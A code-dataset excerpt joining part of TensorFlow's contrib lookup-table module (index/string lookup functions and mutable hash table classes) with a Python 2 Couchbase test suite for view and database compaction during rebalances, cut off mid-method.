`tf.tables_initializer.run()` once.
For example:
```python
mapping_strings = tf.constant(["emerson", "lake", "palmer"])
feats = tf.constant(["emerson", "lake", "and", "palmer"])
ids = tf.contrib.lookup.string_to_index(
feats, mapping=mapping_strings, default_value=-1)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, -1, 2]
```
Args:
tensor: A 1-D input `Tensor` with the strings to map to indices.
mapping: A 1-D string `Tensor` that specifies the mapping of strings to
indices.
default_value: The `int64` value to use for out-of-vocabulary strings.
Defaults to -1.
name: A name for this op (optional).
Returns:
The mapped indices. It has the same shape and tensor type (dense or sparse)
as `tensor`.
"""
table = index_table_from_tensor(
mapping=mapping, default_value=default_value, name=name)
return table.lookup(tensor)
def index_to_string_table_from_file(vocabulary_file,
vocab_size=None,
default_value="UNK",
name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The table is initialized from a vocabulary file specified in
`vocabulary_file`, where the whole line is the value and the
zero-based line number is the index.
Any input which does not have a corresponding index in the vocabulary file
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Sample Usages:
If we have a vocabulary file "test.txt" with the following content:
```
emerson
lake
palmer
```
```python
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_file(
vocabulary_file="test.txt", default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
vocabulary_file: The vocabulary filename.
vocab_size: Number of the elements in the vocabulary, if known.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table to map a string values associated to a given index `int64`
`Tensors`.
Raises:
ValueError: when `vocabulary_file` is empty.
ValueError: when `vocab_size` is invalid.
"""
if not vocabulary_file:
raise ValueError("vocabulary_file must be specified.")
if vocab_size is not None and vocab_size < 1:
raise ValueError("vocab_size must be greater than 0, got %d." % vocab_size)
with ops.name_scope(name, "index_to_string") as scope:
shared_name = ""
if vocab_size:
# Keep a shared_name
# <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
TextFileIndex.LINE_NUMBER,
TextFileIndex.WHOLE_LINE)
else:
# Keep a shared_name <table_type>_<filename>_<key_index>_<value_index>
shared_name = "hash_table_%s_%s_%s" % (vocabulary_file,
TextFileIndex.LINE_NUMBER,
TextFileIndex.WHOLE_LINE)
init = TextFileStringTableInitializer(
vocabulary_file, vocab_size=vocab_size, name="table_init")
# TODO(yleon): Use a more effienct structure.
return HashTable(init, default_value, shared_name=shared_name, name=scope)
def index_to_string_table_from_tensor(mapping, default_value="UNK", name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The mapping is initialized from a string `mapping` 1-D `Tensor` where
each element is a value and the corresponding index within the tensor is the
key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_string = t.constant(["emerson", "lake", "palmer")
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_tensor(
mapping_string, default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table to map a string values associated to a given index `int64`
`Tensors`.
Raises:
ValueError: when `mapping` is not set.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
with ops.name_scope(name, "index_to_string") as scope:
values = ops.convert_to_tensor(mapping, dtypes.string)
num_elements = array_ops.size(values)
keys = math_ops.to_int64(math_ops.range(num_elements))
shared_name = ""
init = KeyValueTensorInitializer(
keys, values, dtypes.int64, dtypes.string, name="table_init")
# TODO(yleon): Use a more effienct structure.
return HashTable(init, default_value, shared_name=shared_name, name=scope)
@deprecated(
"2017-01-07", "This op will be removed after the deprecation date. "
"Please switch to index_to_string_table_from_tensor and call the lookup "
"method of the returned table.")
def index_to_string(tensor, mapping, default_value="UNK", name=None):
"""Maps `tensor` of indices into string values based on `mapping`.
This operation converts `int64` indices into string values. The mapping is
initialized from a string `mapping` tensor where each element is a value and
the corresponding index within the tensor is the key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` once.
For example:
```python
mapping_string = t.constant(["emerson", "lake", "palmer")
indices = tf.constant([1, 5], tf.int64)
values = tf.contrib.lookup.index_to_string(
indices, mapping=mapping_string, default_value="UNKNOWN")
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
tensor: A `int64` `Tensor` with the indices to map to strings.
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The string value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The strings values associated to the indices. The resultant dense
feature value tensor has the same shape as the corresponding `indices`.
"""
table = index_to_string_table_from_tensor(
mapping=mapping, default_value=default_value, name=name)
return table.lookup(tensor)
class MutableHashTable(LookupInterface):
"""A generic mutable hash table implementation.
Data can be inserted by calling the insert method. It does not support
initialization via the init method.
Example usage:
```python
table = tf.contrib.lookup.MutableHashTable(key_dtype=tf.string,
value_dtype=tf.int64,
default_value=-1)
table.insert(keys, values)
out = table.lookup(query_keys)
print out.eval()
```
"""
def __init__(self,
key_dtype,
value_dtype,
default_value,
shared_name=None,
name="MutableHashTable",
checkpoint=True):
"""Creates an empty `MutableHashTable` object.
Creates a table, the type of its keys and values are specified by key_dtype
and value_dtype, respectively.
Args:
key_dtype: the type of the key tensors.
value_dtype: the type of the value tensors.
default_value: The value to use if a key is missing in the table.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
checkpoint: if True, the contents of the table are saved to and restored
from checkpoints. If `shared_name` is empty for a checkpointed table, it
is shared using the table node name.
Returns:
A `MutableHashTable` object.
Raises:
ValueError: If checkpoint is True and no name was specified.
"""
self._default_value = ops.convert_to_tensor(default_value,
dtype=value_dtype)
self._value_shape = self._default_value.get_shape()
# The table must be shared if checkpointing is requested for multi-worker
# training to work correctly. Use the node name if no shared_name has been
# explicitly specified.
use_node_name_sharing = checkpoint and shared_name is None
# pylint: disable=protected-access
if self._default_value.get_shape().ndims == 0:
self._table_ref = gen_lookup_ops._mutable_hash_table(
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
key_dtype=key_dtype,
value_dtype=value_dtype,
name=name)
else:
self._table_ref = gen_lookup_ops._mutable_hash_table_of_tensors(
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
key_dtype=key_dtype,
value_dtype=value_dtype,
value_shape=self._default_value.get_shape(),
name=name)
# pylint: enable=protected-access
super(MutableHashTable, self).__init__(key_dtype, value_dtype,
self._table_ref.op.name.split(
"/")[-1])
if checkpoint:
saveable = MutableHashTable._Saveable(self, name)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size(self._table_ref, name=name)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. Can be a tensor of any shape. Must match the
table's key_dtype.
name: A name for the operation (optional).
Returns:
A tensor containing the values in the same shape as `keys` using the
table's value type.
Raises:
TypeError: when `keys` do not match the table data types.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_lookup_table_find" % self._name,
(self._table_ref, keys, self._default_value)) as name:
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find(
self._table_ref, keys, self._default_value, name=name)
values.set_shape(keys.get_shape().concatenate(self._value_shape))
return values
def insert(self, keys, values, name=None):
"""Associates `keys` with `values`.
Args:
keys: Keys to insert. Can be a tensor of any shape. Must match the
table's key type.
values: Values to be associated with keys. Must be a tensor of the same
shape as `keys` and match the table's value type.
name: A name for the operation (optional).
Returns:
The created Operation.
Raises:
TypeError: when `keys` or `values` doesn't match the table data
types.
"""
self.check_table_dtypes(keys.dtype, values.dtype)
with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
[self._table_ref, keys, values]) as name:
# pylint: disable=protected-access
op = gen_lookup_ops._lookup_table_insert(
self._table_ref, keys, values, name=name)
return op
def export(self, name=None):
"""Returns tensors of all keys and values in the table.
Args:
name: A name for the operation (optional).
Returns:
A pair of tensors with the first tensor containing all keys and the
second tensors containing all values in the table.
"""
with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
exported_keys, exported_values = gen_lookup_ops._lookup_table_export(
self._table_ref, self._key_dtype, self._value_dtype, name=name)
exported_values.set_shape(exported_keys.get_shape().concatenate(
self._value_shape))
return exported_keys, exported_values
class _Saveable(BaseSaverBuilder.SaveableObject):
"""SaveableObject implementation for MutableHashTable."""
def __init__(self, table, name):
tensors = table.export()
specs = [
BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
]
# pylint: disable=protected-access
super(MutableHashTable._Saveable, self).__init__(table, specs, name)
def restore(self, restored_tensors, unused_restored_shapes):
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_import(
self.op._table_ref, restored_tensors[0], restored_tensors[1])
class MutableDenseHashTable(LookupInterface):
"""A generic mutable hash table implementation using tensors as backing store.
Data can be inserted by calling the insert method. It does not support
initialization via the init method.
It uses "open addressing" with quadratic reprobing to resolve collisions.
Compared to `MutableHashTable` the insert and lookup operations in a
`MutableDenseHashTable` are typically faster, but memory usage can be higher.
However, `MutableDenseHashTable` does not require additional memory for
temporary tensors created during checkpointing and restore operations.
Example usage:
```python
table = tf.contrib.lookup.MutableDenseHashTable(key_dtype=tf.int64,
value_dtype=tf.int64,
default_value=-1,
empty_key=0)
table.insert(keys, values)
out = table.lookup(query_keys)
print out.eval()
```
"""
# TODO(andreasst): consider extracting common code with MutableHashTable into
# a common superclass.
def __init__(self,
key_dtype,
value_dtype,
default_value,
empty_key,
initial_num_buckets=None,
shared_name=None,
name="MutableDenseHashTable",
checkpoint=True):
"""Creates an empty `MutableDenseHashTable` object.
Creates a table, the type of its keys and values are specified by key_dtype
and value_dtype, respectively.
Args:
key_dtype: the type of the key tensors.
value_dtype: the type of the value tensors.
default_value: The value to use if a key is missing in the table.
empty_key: the key to use to represent empty buckets internally. Must not
be used in insert or lookup operations.
initial_num_buckets: the initial number of buckets.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
checkpoint: if True, the contents of the table are saved to and restored
from checkpoints. If `shared_name` is empty for a checkpointed table, it
is shared using the table node name.
Returns:
A `MutableHashTable` object.
Raises:
ValueError: If checkpoint is True and no name was specified.
"""
self._default_value = ops.convert_to_tensor(
default_value, dtype=value_dtype)
self._value_shape = self._default_value.get_shape()
# The table must be shared if checkpointing is requested for multi-worker
# training to work correctly. Use the node name if no shared_name has been
# explicitly specified.
use_node_name_sharing = checkpoint and shared_name is None
empty_key = ops.convert_to_tensor(empty_key, dtype=key_dtype)
# pylint: disable=protected-access
self._table_ref = gen_lookup_ops._mutable_dense_hash_table(
empty_key=empty_key,
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
value_dtype=value_dtype,
value_shape=self._value_shape,
initial_num_buckets=initial_num_buckets,
name=name)
# pylint: enable=protected-access
super(MutableDenseHashTable, self).__init__(
key_dtype, value_dtype, self._table_ref.op.name.split("/")[-1])
if checkpoint:
saveable = MutableDenseHashTable._Saveable(self, name)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size(self._table_ref, name=name)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. Can be a tensor of any shape. Must match the
table's key_dtype.
name: A name for the operation (optional).
Returns:
A tensor containing the values in the same shape as `keys` using the
table's value type.
Raises:
TypeError: when `keys` do not match the table data types.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_lookup_table_find" % self._name,
[self._table_ref, keys]) as name:
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find(
self._table_ref, keys, self._default_value, name=name)
if keys.get_shape().ndims is not None and keys.get_shape().ndims > 0:
values.set_shape(
tensor_shape.TensorShape([keys.get_shape().dims[0]]).concatenate(
self._value_shape))
return values
def insert(self, keys, values, name=None):
"""Associates `keys` with `values`.
Args:
keys: Keys to insert. Can be a tensor of any shape. Must match the
table's key type.
values: Values to be associated with keys. Must be a tensor of the same
shape as `keys` and match the table's value type.
name: A name for the operation (optional).
Returns:
The created Operation.
Raises:
TypeError: when `keys` or `values` doesn't match the table data
types.
"""
self.check_table_dtypes(keys.dtype, values.dtype)
with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
[self._table_ref, keys, values]) as name:
# pylint: disable=protected-access
op = gen_lookup_ops._lookup_table_insert(
self._table_ref, keys, values, name=name)
return op
def export(self, name=None):
"""Returns tensors of all keys and values in the table.
Args:
name: A name for the operation (optional).
Returns:
A pair of tensors with the first tensor containing all keys and the
second tensors containing all values in the table.
"""
with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
exported_keys, exported_values = gen_lookup_ops._lookup_table_export(
self._table_ref, self._key_dtype, self._value_dtype, name=name)
exported_values.set_shape(exported_keys.get_shape().concatenate(
self._value_shape))
return exported_keys, exported_values
class _Saveable(BaseSaverBuilder.SaveableObject):
"""SaveableObject implementation for MutableDenseHashTable."""
def __init__(self, table, name):
tensors = table.export()
specs = [
BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
]
# pylint: disable=protected-access
super(MutableDenseHashTable._Saveable, self).__init__(table, specs, name)
def restore(self, restored_tensors, unused_restored_shapes):
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_import(
self.op._table_ref, restored_tensors[0], restored_tensors[1])
|
py | b41524e291a8f6c5c161b46741bfca94525329ff | import time, json
from threading import Thread, Event
import datetime
from tasks.future import TimeoutError
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import DocumentGenerator
from couchbase_helper.documentgenerator import BlobGenerator
from couchbase_helper.document import DesignDocument, View
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
from membase.helper.rebalance_helper import RebalanceHelper
from view.viewquerytests import StoppableThread
class CompactionViewTests(BaseTestCase):
def setUp(self):
super(CompactionViewTests, self).setUp()
self.value_size = self.input.param("value_size", 256)
self.fragmentation_value = self.input.param("fragmentation_value", 80)
self.ddocs_num = self.input.param("ddocs_num", 1)
self.view_per_ddoc = self.input.param("view_per_ddoc", 2)
self.use_dev_views = self.input.param("use_dev_views", False)
self.default_map_func = "function (doc) {\n emit(doc._id, doc);\n}"
self.default_view_name = "default_view"
self.default_view = View(self.default_view_name, self.default_map_func, None)
self.ddocs = []
self.gen_load = BlobGenerator('test_view_compaction', 'test_view_compaction-',
self.value_size, end=self.num_items)
self.thread_crashed = Event()
self.thread_stopped = Event()
def tearDown(self):
super(CompactionViewTests, self).tearDown()
"""Trigger Compaction When specified Fragmentation is reached"""
def test_multiply_compaction(self):
# disable auto compaction
self.disable_compaction()
cycles_num = self.input.param("cycles-num", 3)
# create ddoc and add views
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
# load initial documents
self._load_all_buckets(self.master, self.gen_load, "create", 0)
for i in xrange(cycles_num):
for ddoc in self.ddocs:
# start fragmentation monitor
fragmentation_monitor = \
self.cluster.async_monitor_view_fragmentation(self.master,
ddoc.name,
self.fragmentation_value)
# generate load until fragmentation reached
while fragmentation_monitor.state != "FINISHED":
# update docs to create fragmentation
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
# run queries to create indexes
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
def make_ddocs(self, ddocs_num, views_per_ddoc):
ddoc_name = "compaction_ddoc"
view_name = "compaction_view"
for i in xrange(ddocs_num):
views = self.make_default_views(view_name, views_per_ddoc, different_map=True)
self.ddocs.append(DesignDocument(ddoc_name + str(i), views))
def create_ddocs(self, ddocs=None, bucket=None):
bucket_views = bucket or self.buckets[0]
ddocs_to_create = ddocs or self.ddocs
for ddoc in ddocs_to_create:
if not ddoc.views:
self.cluster.create_view(self.master, ddoc.name, [], bucket=bucket_views)
for view in ddoc.views:
self.cluster.create_view(self.master, ddoc.name, view, bucket=bucket_views)
'''
test changes ram quota during index.
http://www.couchbase.com/issues/browse/CBQE-1649
'''
def test_compaction_with_cluster_ramquota_change(self):
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
gen_load = BlobGenerator('test_view_compaction',
'test_view_compaction-',
self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", 0)
for ddoc in self.ddocs:
fragmentation_monitor = \
self.cluster.async_monitor_view_fragmentation(self.master,
ddoc.name,
self.fragmentation_value)
while fragmentation_monitor.state != "FINISHED":
self._load_all_buckets(self.master, gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
compaction_tasks = []
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_compact_view(self.master, ddoc.name))
remote = RemoteMachineShellConnection(self.master)
cli_command = "setting-cluster"
options = "--cluster-ramsize=%s" % (self.quota + 10)
output, error = remote.execute_couchbase_cli(cli_command=cli_command, options=options, cluster_host="localhost",
user=self.master.rest_username, password=self.master.rest_password)
self.assertTrue('\n'.join(output).find('SUCCESS') != -1, 'ram wasn\'t changed')
self.log.info('Quota was changed')
for task in compaction_tasks:
task.result()
def test_views_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
for ddoc in self.ddocs:
fragmentation_monitor = \
self.cluster.async_monitor_db_fragmentation(self.master, self.fragmentation_value, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED":
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
compaction_task = self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=self.fragmentation_value)
compaction_task.result()
def rebalance_in_with_auto_ddoc_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
compaction_tasks = []
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(self.servers[:self.nodes_init], servs_in, [])
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, with_rebalance=True, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
def rebalance_in_with_ddoc_compaction(self):
self.disable_compaction()
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(self.servers[:self.nodes_init], servs_in, [])
self.sleep(5)
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name, with_rebalance=True)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
def rebalance_out_with_auto_ddoc_compaction(self):
rest = RestConnection(self.master)
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
compaction_tasks = []
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], servs_out)
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, with_rebalance=True, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
def rebalance_out_with_ddoc_compaction(self):
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.disable_compaction()
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance([self.master], [], servs_out)
self.sleep(5)
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name, with_rebalance=True)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance_task.result()
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
def rebalance_in_out_with_auto_ddoc_compaction(self):
rest = RestConnection(self.master)
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
compaction_tasks = []
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, with_rebalance=True, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
rebalance_task.result()
self.verify_cluster_stats(result_nodes)
def rebalance_in_out_with_ddoc_compaction(self):
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.disable_compaction()
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
self._monitor_view_fragmentation()
rebalance_task = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
self.sleep(5)
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name, with_rebalance=True)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance_task.result()
self.verify_cluster_stats(result_nodes)
def test_views_time_compaction(self):
rest = RestConnection(self.master)
currTime = datetime.datetime.now()
fromTime = currTime + datetime.timedelta(hours=1)
toTime = currTime + datetime.timedelta(hours=12)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value, allowedTimePeriodFromHour=fromTime.hour,
allowedTimePeriodFromMin=fromTime.minute, allowedTimePeriodToHour=toTime.hour, allowedTimePeriodToMin=toTime.minute,
allowedTimePeriodAbort="false")
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
self._monitor_view_fragmentation()
currTime = datetime.datetime.now()
#Need to make it configurable
newTime = currTime + datetime.timedelta(minutes=5)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value, allowedTimePeriodFromHour=currTime.hour,
allowedTimePeriodFromMin=currTime.minute, allowedTimePeriodToHour=newTime.hour, allowedTimePeriodToMin=newTime.minute,
allowedTimePeriodAbort="false")
for ddoc in self.ddocs:
status, content = rest.set_view_info(self.default_bucket_name, ddoc.name)
curr_no_of_compactions = content["stats"]["compactions"]
self.log.info("Current number of compactions is {0}".format(curr_no_of_compactions))
compaction_tasks = []
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=self.fragmentation_value))
for task in compaction_tasks:
task.result()
def load_DB_fragmentation(self):
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, self.fragmentation_value, self.default_bucket_name)
rest = RestConnection(self.master)
remote_client = RemoteMachineShellConnection(self.master)
end_time = time.time() + self.wait_timeout * 10
if end_time < time.time() and monitor_fragm.state != "FINISHED":
self.fail("Fragmentation level is not reached in {0} sec".format(self.wait_timeout * 10))
monitor_fragm.result()
try:
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
self.assertTrue(compact_run, "Compaction didn't finished correctly. Please check diags")
except Exception, ex:
self.thread_crashed.set()
raise ex
finally:
if not self.thread_stopped.is_set():
self.thread_stopped.set()
def load_view_fragmentation(self):
query = {"stale" : "false", "full_set" : "true", "connection_timeout" : 60000}
end_time = time.time() + self.wait_timeout * 10
for ddoc in self.ddocs:
fragmentation_monitor = \
self.cluster.async_monitor_db_fragmentation(self.master, self.fragmentation_value, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED":
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, query)
if end_time < time.time() and fragmentation_monitor.state != "FINISHED":
self.fail("impossible to reach compaction value {0} after {1} sec".
format(self.fragmentation_value, (self.wait_timeout * 10)))
fragmentation_monitor.result()
try:
compaction_task = self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=self.fragmentation_value)
compaction_task.result(self.wait_timeout * 5)
except Exception, ex:
self.thread_crashed.set()
raise ex
finally:
if not self.thread_stopped.is_set():
self.thread_stopped.set()
def test_parallel_DB_views_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, parallelDBAndVC="true", viewFragmntThresholdPercentage=self.fragmentation_value, dbFragmentThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
RebalanceHelper.wait_for_persistence(self.master, self.default_bucket_name)
self._compaction_thread()
if self.thread_crashed.is_set():
self.fail("Error occurred during run")
def test_parallel_enable_views_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, parallelDBAndVC="true", viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
RebalanceHelper.wait_for_persistence(self.master, self.default_bucket_name)
self._compaction_thread()
if self.thread_crashed.is_set():
self.log.info("DB Compaction is not started as expected")
def test_parallel_enable_DB_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, parallelDBAndVC="true", dbFragmentThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
RebalanceHelper.wait_for_persistence(self.master, self.default_bucket_name)
self._compaction_thread()
if self.thread_crashed.is_set():
self.log.info("View Compaction is not started as expected")
def test_views_size_compaction(self):
percent_threshold = self.fragmentation_value * 1048576
rest = RestConnection(self.master)
self.set_auto_compaction(rest, viewFragmntThreshold=percent_threshold)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
for ddoc in self.ddocs:
comp_rev, fragmentation = self._get_compaction_details(rest, self.default_bucket_name, ddoc.name)
self.log.info("Stats Compaction Rev and Fragmentation before Compaction is ({0}), ({1})".format(comp_rev, fragmentation))
fragmentation_monitor = self.cluster.async_monitor_disk_size_fragmentation(self.servers[0], percent_threshold, self.default_bucket_name, True)
